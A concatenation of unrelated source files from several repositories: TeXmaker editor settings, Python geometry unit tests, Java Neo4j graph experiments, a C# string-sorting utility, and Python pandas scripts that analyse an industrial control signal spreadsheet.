Quick\Geometry%20Margin%20Right%20Enabled=false
Quick\Geometry%20Margin%20Top%20Enabled=false
Quick\Geometry%20Margin%20Bottom%20Enabled=false
Tools\Latex="S:\\texmf\\miktex\\bin\\xelatex -no-pdf -interaction=nonstopmode %.tex"
Tools\Dvips=S:\\texmf\\miktex\\bin\\xdvipdfmx -vv -E %.xdv
Tools\Ps2pdf=ps2pdf %.ps
Tools\Makeindex=makeindex %.idx
Tools\Bibtex=bibtex %
Tools\Pdflatex="pdflatex -synctex=1 -interaction=nonstopmode %.tex"
Tools\Dvipdf=dvipdf %.dvi
Tools\Dvipng=dvipng -T tight -D 120 %.dvi
Tools\Metapost="mpost -interaction=nonstopmode ?me)"
Tools\Dvi=" %.dvi"
Tools\Ps=C:\\WINDOWS\\system32\\notepad.exe \"?am.ps\"
Tools\Pdf=tmx://internal-pdf-viewer/S:\\FoxitReader\\FoxitReader.exe %.pdf
Tools\Ghostscript=\"C:\\Program Files\\gs\\gs9.02\\bin\\gswin32c.exe\"
Tools\Asy=asy ?m*.asy
Tools\Userquick="S:\\texmf\\miktex\\bin\\xelatex -no-pdf -interaction=nonstopmode %.tex|S:\\texmf\\miktex\\bin\\xdvipdfmx -vv -E %.xdv|S:\\FoxitReader\\FoxitReader.exe %.pdf"
Tools\Precompile=
Tools\SVN="svn "
Tools\SVNADMIN="svnadmin "
Tools\Quick%20Mode=8
Tools\Dvi2Png%20Mode=0
Files\Save%20Files%20Before%20Compiling=2
Preview\Remove%20Beamer%20Class=true
Preview\Precompile%20Preamble=true
Files\Default%20File%20Filter=TeX files (*.tex *.bib *.sty *.cls *.mp)
User\Templates=@Invalid()
Search\Find%20History=@Invalid()
Search\Case%20Sensitive=true
Search\Whole%20Words=false
Search\Regular%20Expression=false
Search\Highlight=true
Search\Cursor=true
Search\Selection=false
Search\Ask%20before%20Replace=false
Search\Escape%20Sequence=false
Search\Replace%20History=@Invalid()
Editor\Completion%20Files=latex-document.cwl, latex-mathsymbols.cwl, tex.cwl, texmakerx.cwl
qttwp\userwidth=700
qttwp\compil=1
qttwp\tocdepth=2
qttwp\startindex=1
qttwp\navigation=1
qttwp\noindex=false
qttwp\title=
qttwp\address=
qttwp\browser=\"C:/Program Files/Internet Explorer/IEXPLORE.EXE\"
qttwp\contentname=\\contentsname
qttwp\align=center
qttwp\lastdir=C:/Documents and Settings/amd
qttwp\dviopt=" -Ppk -V"
InsertGraphics\includeOptions="width=\\textwidth"
InsertGraphics\center=true
InsertGraphics\useFigure=true
InsertGraphics\captionBelow=true
InsertGraphics\placement=htbp
InsertGraphics\spanTwoCols=false
Tools\After%20BibTeX%20Change=tmx://latex && tmx://bibtex && tmx://latex
User\New%20Key%20Replacements%20Created=true
User\Tags=%%, " %%"
User\TagNames=Key replacement: % before word, Key replacement: % after word
User\TagAbbrevs=,
User\TagTriggers="(?<=\\s|^)%", "(?<=\\S)%"
keysetting\size=0
changedLatexMenus=@Variant(\0\0\0\b\0\0\0\0)
CustomToolBar=@Invalid()
FileToolBar=@Invalid()
EditToolBar=@Invalid()
ToolsToolBar=@Invalid()
MathToolBar=@Invalid()
FormatToolBar=@Invalid()
TableToolBar=@Invalid()
DiffToolBar=@Invalid()
CentralToolBar=@Invalid()
customIcons=@Variant(\0\0\0\b\0\0\0\0)
customHighlighting=@Variant(\0\0\0\b\0\0\0\0)
customCommands=@Invalid()
MainWindowState=@ByteArray(\0\0\0\xff\0\0\0\0\xfd\0\0\0\x2\0\0\0\0\0\0\x1\x1b\0\0\x2G\xfc\x2\0\0\0\x1\xfb\0\0\0\x12\0l\0\x65\0\x66\0t\0P\0\x61\0n\0\x65\0l\x1\0\0\0\x36\0\0\x2G\0\0\0g\0\xff\xff\xff\0\0\0\x3\0\0\x3\xcc\0\0\0\xd7\xfc\x1\0\0\0\x1\xfb\0\0\0\x14\0O\0u\0t\0p\0u\0t\0V\0i\0\x65\0w\x1\0\0\x1 \0\0\x3\xcc\0\0\0\x81\0\xff\xff\xff\0\0\x3\xcc\0\0\x1k\0\0\0\x1\0\0\0\x2\0\0\0\x1\0\0\0\x2\xfc\0\0\0\x1\0\0\0\x2\0\0\0\b\0\0\0\f\0\x43\0u\0s\0t\0o\0m\0\0\0\0\0\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\b\0\x46\0i\0l\0\x65\x1\0\0\0\0\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\b\0\x45\0\x64\0i\0t\x1\0\0\0\x82\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\n\0T\0o\0o\0l\0s\x1\0\0\x1!\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\b\0M\0\x61\0t\0h\x1\0\0\x2X\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\f\0\x46\0o\0r\0m\0\x61\0t\x1\0\0\x3\xb0\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\n\0T\0\x61\0\x62\0l\0\x65\x1\0\0\x4x\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\b\0\x44\0i\0\x66\0\x66\x1\0\0\x4\xb2\xff\xff\xff\xff\0\0\0\0\0\0\0\0)
MainWindowFullssscreenState=@ByteArray()
MainWindow\Maximized=false
MainWindow\FullScreen=false
Geometries\MainwindowWidth=1260
Geometries\MainwindowHeight=668
Geometries\MainwindowX=11
Geometries\MainwindowY=48
Symbols\Quantity=@Variant(\0\0\0\b\0\0\0\0)
Symbols\Favorite%20IDs=@Invalid()
Symbols\hiddenlists=
StructureView\SingleDocMode=false
Editor%20Key%20Mapping\0=20483
Files\Session\CurrentFile=S:/examples/simple.tex
Files\Last%20Document=S:/examples/simple.tex
Files\Recent%20Files=S:/examples/simple.tex, D:/LyTeX2/MyDoc/python_intro/yen_python_intro.tex
[formats]
version=1.0
<file_sep>import sys
import unittest
from math import pi, sin, cos, sqrt
from occmodel import *
class test_Solid(unittest.TestCase):
def almostEqual(self, a, b, places = 7):
for va,vb in zip(a,b):
self.assertAlmostEqual(va, vb, places)
def test_centreOfMass(self):
eq = self.almostEqual
solid = Solid()
solid.createSphere((0.,0.,0.),1.)
eq(solid.centreOfMass(), (0.,0.,0.))
def test_translate(self):
eq = self.almostEqual
solid = Solid()
solid.createSphere((0.,0.,0.),1.)
solid.translate((1.,2.,3.))
eq(solid.centreOfMass(), (1.,2.,3.))
def test_rotate(self):
eq = self.almostEqual
solid = Solid()
solid.createSphere((0.,0.,0.),1.)
solid.rotate(-pi/2., (0.,1.,0.),(1.,1.,0.))
eq(solid.centreOfMass(), (1.,0.,-1.))
def test_scale(self):
eq = self.assertAlmostEqual
scale = .5
solid = Solid()
solid.createSphere((0.,0.,0.),1.)
solid.scale((0.,0.,0.), scale)
#eq(solid.area(), scale*4.*pi, places = 3)
#eq(solid.volume(), scale*4./3.*pi, places = 3)
def test_addSolids(self):
eq = self.assertAlmostEqual
s1 = Solid().createSphere((0.,0.,0.),1.)
s2 = Solid().createSphere((2.,0.,0.),1.)
s3 = Solid().addSolids((s1,s2))
self.assertEqual(s3.numSolids(), 2)
eq(s3.area(), 2.*4.*pi, places = 3)
eq(s3.volume(), 2.*4./3.*pi, places = 3)
s1 = Solid().createSphere((0.,0.,0.),.5)
self.assertEqual(s1.numSolids(), 1)
s2 = Solid().createSphere((2.,0.,0.),.5)
s1.addSolids(s2)
self.assertEqual(s1.numSolids(), 2)
s3 = Solid().createSphere((4.,0.,0.),.5)
s1.addSolids(s3)
self.assertEqual(s1.numSolids(), 3)
def test_createSphere(self):
eq = self.assertAlmostEqual
self.assertRaises(OCCError, Solid().createSphere, (0.,0.,0.),0.)
self.assertRaises(OCCError, Solid().createSphere, (0.,0.,0.),-1.)
solid = Solid()
solid.createSphere((0.,0.,0.),1.)
eq(solid.area(), 4.*pi, places = 3)
eq(solid.volume(), 4./3.*pi, places = 3)
def test_createCylinder(self):
eq = self.assertAlmostEqual
self.assertRaises(OCCError, Solid().createCylinder, (0.,0.,0.),(0.,0.,1.), 0.)
self.assertRaises(OCCError, Solid().createCylinder, (0.,0.,0.),(0.,0.,1.), -1.)
solid = Solid()
solid.createCylinder((0.,0.,0.),(0.,0.,1.), 1.)
eq(solid.area(), 4.*pi, places = 3)
eq(solid.volume(), pi, places = 3)
def test_createTorus(self):
eq = self.assertAlmostEqual
self.assertRaises(OCCError, Solid().createTorus, (0.,0.,0.),(0.,0.,.1), 0., 1.)
self.assertRaises(OCCError, Solid().createTorus, (0.,0.,0.),(0.,0.,.1), 1., 0.)
solid = Solid()
solid.createTorus((0.,0.,0.),(0.,0.,.1), 2., 1.)
eq(solid.area(), 4.*pi**2*2.*1., places = 1)
eq(solid.volume(), 2.*pi**2*2.*1.**2, places = 3)
def test_createTorus(self):
eq = self.assertAlmostEqual
self.assertRaises(OCCError, Solid().createCone, (0.,0.,0.),(0.,0.,1.), 0., 0.)
self.assertRaises(OCCError, Solid().createCone, (0.,0.,0.),(0.,0.,1.), 1., 1.)
solid = Solid()
solid.createCone((0.,0.,0.),(0.,0.,.1), 2., 1.)
self.assertEqual(solid.volume() > 0., True)
def test_createBox(self):
eq = self.assertAlmostEqual
self.assertRaises(OCCError, Solid().createBox, (-.5,-.5,-.5),(-.5,-.5,-.5))
solid = Solid()
solid.createBox((-.5,-.5,-.5),(.5,.5,.5))
eq(solid.volume(), 1.)
if __name__ == "__main__":
sys.dont_write_bytecode = True
unittest.main() | ea1ab50f8572cf5b964183311ca126f798c3d115 | [
"JavaScript",
"Markdown",
"INI",
"Python",
"PHP",
"Shell"
] | 32 | Python | 90umut/extensions | 5086b8a7a65cb170096336f2f680274a7ab194df | bb99637d1bf90b82bc32af4c53d18e4176f50ef0 |
refs/heads/master | <file_sep>package main;
import java.io.File;
import java.io.FileNotFoundException;
import java.util.ArrayList;
import java.util.List;
import java.util.Scanner;
import static java.lang.System.out;
public class JParser {
private String term1;
private String relation;
private String term2;
private int num_lines;
private List<Statement> list;
private Scanner scan;
public JParser(File file) throws FileNotFoundException{
try{
list = new ArrayList<Statement>();
scan = new Scanner(file);
makeStatements();
}
catch(FileNotFoundException e){
out.println(e.getMessage());
}
}
public int getLineNumbers(){
return num_lines;
}
public void makeStatements(){
while (scan.hasNextLine()){
if (!scan.hasNext())
break;
term1 = scan.next();
relation = scan.next();
term2 = scan.next();
list.add(new Statement(term1, term2, relation));
out.println("\nterm1:" +term1+ " term2:" +term2+ " relationship:" +relation);
num_lines++;
}
}
public List<Statement> getStatements(){
return list;
}
}
<file_sep>package main;
public class JBEL {
String name;
}
<file_sep>package main;
import org.neo4j.graphdb.RelationshipType;
import main.GraphDBasic.RelTypes;
public class Statement {
private String term1;
private String term2;
String r;
public Statement(String t1, String t2, String r){
this.term1 = t1;
this.term2 = t2;
this.r = r;
}
public String getFirstTerm(){
return term1;
}
public String getSecondTerm(){
return term2;
}
public RelationshipType getRelationshipType(){
if (r.equals("INCREASES"))
return RelTypes.INCREASES;
if (r.equals("DECREASES"))
return RelTypes.DECREASES;
if (r.equals("EATS"))
return RelTypes.EATS;
if (r.equals("HATES"))
return RelTypes.HATES;
else if (r.equals("LOVES"))
return RelTypes.LOVES;
else
return null;
}
public String toString() {
return term1 + " " + r + " " +term2;
}
}
<file_sep>package main;
import org.neo4j.graphdb.Direction;
import org.neo4j.graphdb.GraphDatabaseService;
import org.neo4j.graphdb.Node;
import org.neo4j.graphdb.Relationship;
import org.neo4j.graphdb.RelationshipType;
import org.neo4j.graphdb.Transaction;
import org.neo4j.graphdb.factory.GraphDatabaseFactory;
import org.neo4j.graphdb.index.Index;
import org.neo4j.kernel.EmbeddedGraphDatabase;
import static java.lang.System.out;
@SuppressWarnings("unused")
public class UserLookups {
private static GraphDatabaseService graphDb;
private static final String USERNAME_KEY = "username";
private static Index<Node> nodeIndex;
private static enum RelTypes implements RelationshipType{
USERS_REF,
USER
}
private static String idToUserName(final int id){
return "user" + id + "@sel<EMAIL>.org";
}
private static Node createAndIndexUser( final String username )
{
Node node = graphDb.createNode();
node.setProperty( USERNAME_KEY, username );
nodeIndex.add( node, USERNAME_KEY, username );
return node;
}
private static void registerShutdownHook( final GraphDatabaseService graphDb )
{
// Registers a shutdown hook for the Neo4j instance so that it
// shuts down nicely when the VM exits (even if you "Ctrl-C" the
// running example before it's completed)
Runtime.getRuntime().addShutdownHook( new Thread()
{
@Override
public void run()
{
graphDb.shutdown();
}
} );
}
public static void main(String[] args){
GraphDatabaseService gdbs = new GraphDatabaseFactory().newEmbeddedDatabase("var/db_tmp");
//nodeIndex = gdbs.
}
}
<file_sep>GraphDBing
==========
Graph Database experimenting | a7a0d89baedeebcf4209a897cc0f222cb9ec578b | [
"Markdown",
"Java"
] | 5 | Java | jhourani/GraphDBing | b9800bcbc9c671a976fdfb6d83128f568f7dbf6b | 47a7b4eef5fe49c46eadfd6495fa0fd09c75ae3a |
refs/heads/master | <repo_name>LostInTexas/FILO<file_sep>/FILO.Domain/ISortMultiple.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace FILO.Domain
{
public interface ISortMultiple
{
string SortString(string value);
}
}
<file_sep>/FILO.Domain/Sort.cs
using System;
using System.Collections.Generic;
namespace FILO.Domain
{
public class Sort: ISortMultiple, ISortSingle
{
// Reorder the received string using a multi-facet for loops
// 1st loop places non-alphanumeric as anchors, anchors stay in the same position and are not sorted
// 2nd loop reverses the string and making sure that the "anchors" stays in place
string ISortMultiple.SortString(string value)
{
try
{
char[] originals = value.ToCharArray();
char[] sorted = new char[value.Length];
Array.Clear(sorted, 0, sorted.Length);
//Put anchors in
for (int i = 0; i < value.Length; i++)
{
if (!char.IsLetterOrDigit(originals[i]))
{
sorted[i] = originals[i];
}
}
int position = value.Length - 1;
foreach (char letter in originals)
{
if (char.IsLetterOrDigit(letter))
{
while (sorted[position] != 0 && position >= 0)
{
position--;
}
sorted[position] = letter;
position--;
}
}
return new string(sorted);
}
catch (Exception e)
{
//Add appropriate exception handling here
//Should bubble up the error to the caller
}
return null;
}
// Reorder the received string using a single loop making sure that non-alphanumerics do not change position
// in the reordering of the string
string ISortSingle.SortString(string value)
{
try
{
char[] original = value.ToCharArray();
int position = original.Length - 1;
int index = 0;
while (index < position)
{
if (!char.IsLetterOrDigit(original[index]))
index += 1;
else if (!char.IsLetterOrDigit(original[position]))
position -= 1;
else
{
char letter = original[index];
original[index] = original[position];
original[position] = letter;
index += 1;
position -= 1;
}
}
return new string(original);
}
catch (Exception e)
{
//Add appropriate exception handling here
//Should bubble up the error to the caller
}
return null;
}
}
}
<file_sep>/FILOApp/FILOApp/Program.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using FILO.Domain;
using Newtonsoft.Json;
namespace FILOApp
{
class Program
{
static void Main(string[] args)
{
try
{
ISortSingle sortSingle = new Sort();
ISortMultiple sortMultiple = new Sort();
string json;
List<Data> items;
string[] lines = System.IO.File.ReadAllLines(@"file.txt");
foreach (string s in lines)
{
Console.WriteLine(string.Concat("Original string: ", s));
Console.WriteLine(string.Concat("Method 1: ", sortSingle.SortString(s)));
Console.WriteLine(string.Concat("Method 2: ", sortMultiple.SortString(s)));
}
}
catch (Exception e)
{
Console.WriteLine("An error occured: ");
Console.WriteLine(e.Message);
}
finally
{
Console.WriteLine("Press enter");
Console.ReadLine();
}
}
}
}
| 386b5a609046876861532dd818c630704fc5bc0f | [
"C#"
] | 3 | C# | LostInTexas/FILO | 8a268589f0b8f1ff838fc3c4b6defbddd8e9f219 | c46ef90677dc3dcd09fdfb41058ec16b7923d274 |
refs/heads/master | <file_sep>Ten Pin Bowling Score Keeper build for BBC Technical Assessment.
Created by <NAME>
Can be viewed live here: http://users.aber.ac.uk/swt3/bowling
<file_sep>
function Player(name) {
this.name = name;
this.frames = [];
}
Player.prototype.addScore = function(score) {
if(this.isGameOver())
return false;
var frame = this.frames[this.frames.length - 1];
// If required, new frame is created and added to array
if(this.isFrameOver()) {
frame = [];
this.frames.push(frame);
}
// If not last frame, see if score for the frame won't be greater than 10
// if we in the final frame, see if score for any normal (non-bonus) rounds won't be greater than 10
if((this.frames.length < 10 && (frame[0] || 0) + score <= 10) ||
(this.frames.length == 10 && (frame[0] == 10 || (frame[0] || 0) + score <= 10 || frame[0] + frame[1] == 10))) {
frame.push(score);
return true;
} else {
return false;
}
}
Player.prototype.getFrames = function() {
return this.frames;
}
Player.prototype.getRolls = function() {
var rolls = [];
rolls = rolls.concat.apply(rolls, this.frames);
return rolls;
}
Player.prototype.getScore = function() {
var score = 0;
var frames = this.getFrames();
for(var i = 0; i < frames.length; i++) {
var frame = frames[i];
for(var j = 0; j < frame.length; j++) {
// Add the score for this round
score += frame[j];
if(i < (9) && j == 0 && frame[j] == 10 && frames[i + 1]) {
// If there's a strike then add the next two rolls as extra points
score += frames[i + 1][0] || 0;
score += frames[i + 1][1] || (frames[i + 2] ? frames[i + 2][0] : 0);
} else if(j == 1 && (frame[0] + frame[1]) == 10 && frames[i + 1]) {
// If there's a spare, add the next round as extra points
score += frames[i + 1][0] || 0;
}
}
}
return score;
}
Player.prototype.showError = function(errorMessage) {
// Show the error box and display the given message
var error = document.querySelector('#error');
error.innerHTML = errorMessage;
error.style.visibility = 'initial';
}
Player.prototype.getRollInFrame = function() {
// If we have some frames, return the length of the last frame, otherwise return 0
return this.frames[0] ? this.frames[this.frames.length - 1].length : 0;
}
Player.prototype.isFrameOver = function() {
var frame = this.frames[this.frames.length - 1];
// The frame is over if there is no frame (this is helpful in the addScore method)
// when not the last frame and there have been two rounds OR the first round was a strike
// we are in the last frame and there have been three rounds OR the first two rounds scored less than 10
return !frame || (this.frames.length < 10 && (frame.length == 2 || frame[0] == 10)) || (this.frames.length == 10 && (frame.length == 3 || frame[0] + frame[1] < 10));
}
Player.prototype.isGameOver = function() {
return this.frames.length == 10 && this.isFrameOver();
}
| b821f58309304a1fe6e6d9e5f7aa31a262719ccb | [
"Markdown",
"JavaScript"
] | 2 | Markdown | stuartthomas/Ten-Pin-Bowling2 | c999baa71457e69dc8f0a0fc057f46d136c05f79 | 9c8f85c3db036d0fd5699b363111706cbdf3934e |
refs/heads/master | <file_sep>import pandas as pd
import os
import glob
from datetime import datetime
from GeneratePLCcode import importdf
KISes = [
"КИС320.1",
"КИС336.1",
"КИС336.2",
"КИС336.3",
"КИС420.1",
"КИС420.2",
"КИС420.3",
"КИС420.4",
"КИС420.5",
"КИС420.6",
"КИС420.7"]
object_types = [
"Клапан",
"Электронагреватель",
"AI",
"AI_Sign",
"Электрофорезный фильтр",
"Фильтр рулонный",
"КИД",
"МЕО1",
"Сигнализатор",
"Вентилятор",
"Избиратель",
"Контактный аппарат",
"Мешалка",
"Насос",
"Шибер"]
foo_switcher = {
"Клапан": [
"OP",
"CL",
"Local",
"Remoute",
"Power_En",
"CMD_OP_GCHU",
"CMD_CL_GCHU",
"CMD_STP_GCHU",
"CMD_OP_RCHU",
"CMD_CL_RCHU",
"CMD_STP_RCHU",
"Auto_mode",
"Man_mode"],
'el_nagr': [
"Run",
"Cmd_Strt_Local",
"Cmd_Strt_Rchu"],
"AI": ["In"],
"AI_complicate": [
"Limit4_H",
"Limit9_L_PS2",
"Limit10_LL_PS2_Dis",
"Limit7_L_Dis",
"Limit8_LL_Dis",
"Limit4_H_Dis",
"Limit8_LL",
"Limit10_LL_PS2",
"Limit7_L",
"Limit9_L_PS2_Dis",
"Limit1_HH_PS2",
"Limit1_HH_PS2_Dis",
"Limit3_HH",
"Limit3_HH_Dis",
"Limit3_HH_Cmd",
"Limit8_LL_Cmd",
"Limit10_LL_PS2_Cmd",
"Limit4_H_Cmd",
"Limit1_HH_PS2_Cmd",
"Limit7_L_Cmd",
"Limit9_L_PS2_Cmd",
"Power_En",
"Limit2_H_PS2",
"Limit2_H_PS2_Cmd",
"Limit2_HH_PS2_Dis",
"In"],
"Сигн AI": [
"Limit3_HH_Cmd",
"Limit4_H_Cmd",
"Limit7_L",
"Limit4_H",
"Limit4_H_Dis",
"Limit3_HH_Dis",
"Limit3_HH",
"Limit7_L_Dis",
"Limit8_LL_Dis",
"Limit8_LL",
"Limit7_L_Cmd",
"Limit8_LL_Cmd",
"Limit9_L_PS2_Cmd",
"Limit6_Ln",
"Limit6_Ln_Dis",
"Limit6_Ln_Cmd",
"Limit5_Hn",
"Power_En",
"Limit2_HH_PS2_Dis",
"Limit2_H_PS2",
"Limit2_H_PS2_Cmd",
"Limit10_LL_PS2_Cmd",
"Limit5_Hn_Cmd",
"Limit9_L_PS2",
"Limit10_LL_PS2",
"Limit9_L_PS2_Dis",
"Limit10_LL_PS2_Dis",
"In"],
"Сигн AI ??": [
"Limit3_HH_Cmd",
"Limit4_H_Cmd",
"Limit7_L",
"Limit4_H",
"Limit4_H_Dis",
"Limit3_HH_Dis",
"Limit3_HH",
"Limit7_L_Dis",
"Limit8_LL_Dis",
"Limit8_LL",
"Limit7_L_Cmd",
"Limit8_LL_Cmd",
"Limit9_L_PS2_Cmd",
"Limit6_Ln",
"Limit6_Ln_Dis",
"Limit6_Ln_Cmd",
"Limit5_Hn",
"Power_En",
"Limit2_HH_PS2_Dis",
"Limit2_H_PS2",
"Limit2_H_PS2_Cmd",
"Limit10_LL_PS2_Cmd",
"Limit5_Hn_Cmd",
"Limit9_L_PS2",
"Limit10_LL_PS2",
"Limit9_L_PS2_Dis",
"Limit10_LL_PS2_Dis"
"In"],
"Elektroforez": [
"Limit7_L",
"Limit8_LL",
"On_Perepolus",
"On_Rabota"],
"flt_rulon": [
"Run",
"Remoute",
"Local",
"Cmd_Strt_Gchu",
"Cmd_Strt_Local"],
'kid': [
"Cmd_Cl_Gchu",
"Cmd_Op_Gchu",
"Power_En_Rchu",
"CL",
"OP",
"Remoute",
"Power_En_Cho"],
'meo_1': [
"na_back",
"na_forw"],
'NO': [],
"Signalizator": ["Sign"],
"вентилятор": [
"Cmd_Strt_Rchu",
"Man_Mode",
"Run",
"Local",
"Remoute",
"Pozar_Run",
"Avaria_Stp",
"Stp",
"Auto_Mode",
"Auto_Main_On",
"No_Power_En",
"Cmd_Strt_Local",
"Klapan_Cl",
"Avaria_Off",
"Klapan_Op",
"Auto_Back_On",
"Remoute_On"],
"вентилятор ??": [
"Cmd_Strt_Rchu",
"Man_Mode",
"Run",
"Local",
"Remoute",
"Pozar_Run",
"Avaria_Stp",
"Stp",
"Auto_Mode",
"Auto_Main_On",
"No_Power_En",
"Cmd_Strt_Local",
"Klapan_Cl",
"Avaria_Off",
"Klapan_Op",
"Auto_Back_On",
"Remoute_On"],
"избиратель": [
"Manual_mode",
"Auto_Mode"],
"Контактный аппарат": [
"Man_Mode_2",
"Cmd_Strt_Gchu_2",
"Auto_Mode_2",
"Man_Mode_1",
"Cmd_Strt_Gchu_1",
"Auto_Mode_1",
"Cmd_Stp_Rchu_2",
"Cmd_Stp_Rchu_1",
"Cmd_Strt_Rchu_2",
"Cmd_Strt_Rchu_1",
"Run_2",
"Run_1",
"On_Run_1",
"Power_En",
"On_Stp_1",
"Cmd_Stp_Gchu_1",
"Cmd_Stp_Gchu_2",
"Power_En_1",
"Power_En_2",
"Main_Mode_1",
"Main_Mode_2"],
"мешалка": [
"Run",
"Local",
"Remoute",
"Cmd_On"],
"Насос": [
"Cmd_Strt_Rchu",
"Cmd_Stp_Rchu",
"Cmd_Strt_Gchu",
"Cmd_Stp_Gchu",
"Main_Mode",
"Cmd_Stp_Local",
"Auto_Mode",
"Local",
"Remoute",
"Backup_Mode",
"Run",
"Power_En",
"Auto_Main_On",
"Membrana",
"Stp",
"Auto_Back_On",
"Cmd_Strt_Local",
"Man_Mode"],
"Насос ??": [
"Cmd_Strt_Rchu",
"Cmd_Stp_Rchu",
"Cmd_Strt_Gchu",
"Cmd_Stp_Gchu",
"Main_Mode",
"Cmd_Stp_Local",
"Auto_Mode",
"Local",
"Remoute",
"Backup_Mode",
"Run",
"Power_En",
"Auto_Main_On",
"Membrana",
"Stp",
"Auto_Back_On",
"Cmd_Strt_Local",
"Man_Mode"],
"Насос ??": [
"Cmd_Strt_Rchu",
"Cmd_Stp_Rchu",
"Cmd_Strt_Gchu",
"Cmd_Stp_Gchu",
"Main_Mode",
"Cmd_Stp_Local",
"Auto_Mode",
"Local",
"Remoute",
"Backup_Mode",
"Run",
"Power_En",
"Auto_Main_On",
"Membrana",
"Stp",
"Auto_Back_On",
"Cmd_Strt_Local",
"Man_Mode"],
"РЕЗЕРВ": [],
"Шибер": []
}
starttime = datetime.now()
inputfile = r'C:\Users\rangin\Desktop\MS_objects\WORK_master_basa.xlsm'
sheetname = 'Лист1'
folder = r'C:\Users\rangin\Desktop\MS_objects\ '
files = glob.glob(os.path.join(folder[:-1], '*.txt'))
ilist = {}
for file in files:
f = open(file, 'r')
for line in f:
ilist.update({line.rstrip(): file.split('\\')[-1]})
f.close()
df = importdf(inputfile, sheetname)
# Заполнить строку с номерами элементов в массиве пересылки
df['Номер элемента в массиве пересылки'] = ''
df.sort_values(by=['Наименов_0'])
df1 = df.loc[df['Не использовать сигнал'] != 1]
array_indexes = {
"КИС320.1": 0,
"КИС336.1": 0,
"КИС336.2": 0,
"КИС336.3": 0,
"КИС420.1": 0,
"КИС420.2": 0,
"КИС420.3": 0,
"КИС420.4": 0,
"КИС420.5": 0,
"КИС420.6": 0,
"КИС420.7": 0}
arr_index_KIS = [0] * len(KISes)
for i in range(0, len(KISes)):
arr_index_KIS[i] = array_indexes.copy()
for index, row in df1.iterrows():
if row['Номер КИС'] != row['Номер КИС к родителю'] and "КИС" in str(row['Номер КИС к родителю']):
df1.at[index, 'Номер элемента в массиве пересылки'] = arr_index_KIS[KISes.index(row['Номер КИС'])][row['Номер КИС к родителю']] # =array_indexes[row['Номер КИС к родителю']]
arr_index_KIS[KISes.index(row['Номер КИС'])][row['Номер КИС к родителю']] = arr_index_KIS[KISes.index(row['Номер КИС'])][row['Номер КИС к родителю']] + 1
naimen_0 = df1["Наименов_0"].unique().tolist()
naimen_0 = [x for x in naimen_0 if str(x) != 'nan'] # Убираем NaN
total = len(naimen_0) - 1
d = {'Объект': [], 'КИС': [], 'Привязка к мнемосхеме': []}
odf = pd.DataFrame(data=d)
for name in naimen_0:
try:
MS = [ilist[name].replace('.RDB.txt', '')]
except KeyError:
MS = 'Не используется на мнемосхеме'
odf = odf.append({'Объект': [name], 'КИС': [df1.loc[df1["Наименов_0"] == name]["Номер КИС к родителю"].values[0]], 'Привязка к мнемосхеме': MS}, ignore_index=True)
odf.to_excel(folder[:-1] + "output.xlsx")
<file_sep># Гистограмма количества объектов по типам объектов
import matplotlib.pyplot as plt
import pandas as pd
inputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\Копия WORK_10998_from 19дек 13-40+Сводная.xlsx'
df = pd.read_excel(inputfile, sheet_name='Лист1')
df["Тип объекта"] = df["Тип объекта"].str.replace(r'?', '').copy()
df["Тип объекта"] = df["Тип объекта"].str.strip()
y = df.loc[df["Уникальное значение"] == 1]["Тип объекта"].value_counts()
fig, ax = plt.subplots(figsize=(14, 10))
ind = y.max()
for i, v in enumerate(y):
ax.text(v + 3, i + 0.15, str(v), color='blue', fontweight='bold')
ax.barh(y.keys(), y.values, left=0, height=0.5, color="blue")
ax.set_yticklabels(y.keys(), minor=False)
plt.title('Количество объектов в базе')
plt.xlabel('Количество, шт.')
plt.ylabel('Тип объекта')
plt.show()
<file_sep>import xml.etree.ElementTree as ET
filename = r'C:\Users\1\Desktop\test_export_mast.xpg'
tree = ET.parse(filename)
root = tree.getroot()
for program in root.findall('program'):
identProgram = program.find('identProgram')
name = identProgram.get('name')
if name == "DI_Filtration_A026_A029":
stsource = program.find('STSource').text
program.find('STSource').text = "Hello WORLD \n" + stsource
tree.write('output.xpg', encoding='UTF-8')
<file_sep># Поиск дубликатов в разных КИС по названию объекта
import os
path = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Объекты\Электронагреватель\el_nagr_TXT\ '
files = os.listdir(path[:-1])
analyzed = []
for x in files:
if "analyzed.txt" in x:
analyzed.append(x)
for i in range(0, len(analyzed)-1):
for j in range(i+1, len(analyzed)-1):
f1 = open(path[:-1] + analyzed[i])
f2 = open(path[:-1] + analyzed[j])
for f in f1:
if f in f2:
print(f + ' встречается в ' + analyzed[i][:9] + ' и в ' + analyzed[j][:9])
f1.close()
f2.close()
print(analyzed)
<file_sep>import pandas as pd
inputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\Старое\Бэкап от 29062020 Ревизия + WORK_10998_from 19дек 13-40+Сводная.xlsx'
df = pd.read_excel(inputfile, sheet_name='Лист1')
# print(df.head())
naimen_0 = df["Наименов_0"].unique().tolist()
naimen_0 = {x for x in naimen_0 if x == x} # Убираем NaN
questionable_names = []
for name in naimen_0:
# print(str(name)+'\n')
types = df.loc[df['Наименов_0'] == name]["Вход блока"]
unique_types = types.unique()
duplicated_types = types.duplicated()
# if len(types) > 1:
if "True" in str(duplicated_types):
print(str(name)+str(unique_types))
questionable_names.append(name)
print('end')
<file_sep>import pandas as pd
import os
from datetime import datetime
def importdf(filename, sheet):
dataframe = pd.read_excel(filename, sheet_name=sheet)
return dataframe
def logerror(text):
ff = open(currentdirname + '\\errors.txt', 'a+')
ff.write(text + '\n')
ff.close()
def foo(data, block_inputs):
parent_KIS = data['Номер КИС к родителю'].values[0]
if 'КИС' not in str(parent_KIS):
parent_KIS = data['Номер КИС'].values[0]
obj_type = data['Тип объекта'].values[0]
obj_name = data['Наименов_0'].values[0]
# Print для того, чтобы видеть, что не виснет
print(f'{obj_name} - {nomer} из {total}')
